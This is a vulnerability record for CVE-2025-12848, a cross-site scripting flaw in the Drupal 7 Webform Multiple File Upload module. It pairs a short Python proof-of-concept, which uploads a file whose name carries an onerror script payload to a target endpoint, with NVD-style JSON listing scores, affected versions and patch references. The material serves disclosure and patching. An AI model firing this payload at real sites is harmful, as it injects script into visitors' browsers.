CVE-2025-12848

import requests import sys # CVE-2025-12848 PoC - XSS via malicious filename in Drupal Webform Multifile # Target: Drupal 7.x with Webform Multiple File Upload module # Vulnerability: XSS in file name renderer target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.local' webform_path = '/webform/multifile-endpoint' # Malicious filename to trigger XSS malicious_filename = '<img src=1 onerror=alert(document.domain)>' # Prepare the malicious file files = { 'files[files][]': ( malicious_filename, 'dummy content', 'application/octet-stream' ) } # Send the malicious file upload request try: response = requests.post( f'{target_url}{webform_path}', files=files, timeout=10 ) print(f'Status Code: {response.status_code}') print(f'Response: {response.text[:500]}') print('\nPoC sent successfully. If the target is vulnerable,') print('the XSS payload will execute when the filename is rendered.') except requests.exceptions.RequestException as e: print(f'Request failed: {e}')

{"cve": {"id": "CVE-2025-12848", "sourceIdentifier": "[email protected]", "published": "2025-11-26T02:15:48.817", "lastModified": "2026-03-26T21:17:00.010", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Webform Multiple File Upload module for Drupal 7.x contains a cross-site scripting (XSS) vulnerability in the file name renderer. An unauthenticated attacker can exploit this vulnerability by uploading a file with a malicious\nfilename containing JavaScript code (e.g., \"<img src=1 onerror=alert(document.domain)>\") to a Webform node with a Multifile field where file type validation is disabled. This allows the execution of arbitrary scripts\nin the context of the victim's browser.\n \nThe issue is present in a third-party library and has been addressed in a patch available at  https://github.com/fyneworks/multifile/pull/44 . Users are advised to apply the provided patch or update to a fixed version of the module."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:X/R:U/V:D/RE:L/U:Amber", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "NOT_DEFINED", "Recovery": "USER", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "LOW", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.2:*:*:*:*:drupal:*:*", "matchCriteriaId": "36B05E21-D024-4BDD-8278-D41CB19AC1E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.3:*:*:*:*:drupal:*:*", "matchCriteriaId": "E5483807-EF6D-49EB-BA44-B87F687B13C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.4:*:*:*:*:drupal:*:*", "matchCriteriaId": "AF414458-4EF4-4C86-84E2-22D3AAED513E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.5:*:*:*:*:drupal:*:*", "matchCriteriaId": "379AA449-C4C9-475F-8614-A7654BE530EA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.6:*:*:*:*:drupal:*:*", "matchCriteriaId": "B4B38B66-E62F-42EF-8979-4BDE49B5EEDC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.x:dev:*:*:*:drupal:*:*", "matchCriteriaId": "BC4FEB91-00A6-40BD-A9AC-368E6AADBA45"}]}]}], "references": [{"url": "https://d7es.tag1.com/security-advisories/webform-multiple-file-upload-critical-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.d7security.org/security-advisories/D7SECURITY-SA-CONTRIB-2025-001/", "source": "[email protected]"}, {"url": "https://www.drupal.org/node/3105204", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://www.herodevs.com/vulnerability-directory/cve-2025-12848", "source": "[email protected]"}]}}